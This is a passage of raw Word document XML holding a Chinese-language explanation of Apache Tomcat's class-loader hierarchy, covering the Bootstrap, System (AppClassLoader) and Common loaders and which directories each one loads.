          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的类加载器体系为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:Bootstrap---&gt;System---&gt;Common----&gt;Catalina,Shared</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A84035" w:rsidRDefault="00A84035" w:rsidP="00C10394">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Shared------&gt;Webapp1,Webapp2 .....</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A84035" w:rsidRDefault="00A84035" w:rsidP="00C10394">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下面是对每个类加载器的定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A84035" w:rsidRDefault="00A84035" w:rsidP="00C10394">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1.Bootstrap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加载器在这里是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Bootstrap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ExtClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的总称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>负责加载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>核心包的类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;Java_Home&gt;/jre/lib/ext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>目录下的类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通常我们开发人员并不关心</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我想只要是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>程序这些肯定是必要的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A84035" w:rsidRDefault="00A84035" w:rsidP="00C10394">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就是系统加载器</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一般是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AppClassLoader,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>负责加载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ClassPath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>环境变量设置目录下的值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这个我们开发人员会非常关注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>但是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虽然用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AppClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类加载器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>但我们设置的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ClassPath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对它没有影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果有影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>那就麻烦了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将会导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>运行不稳定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为什么呢</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每次启动的时候都会在命令行窗口中都会重新设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Classpath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:&lt;catalina_Home&gt;/bin/bootstrap.jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;java_Home&gt;/lib/tools.jar,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所以这里面的类一般对应用程序不可见的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>除非你设置了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A84035" w:rsidRDefault="00A84035" w:rsidP="00C10394">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3.Common</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类加载器负责加载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TomcatHOME/common/class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.Class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>common/lib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这些类可以被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内核和每个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用程序都可以看见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一般放公用的一些重要的类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>servlet.jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A84035" w:rsidRDefault="00A84035" w:rsidP="00C10394">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
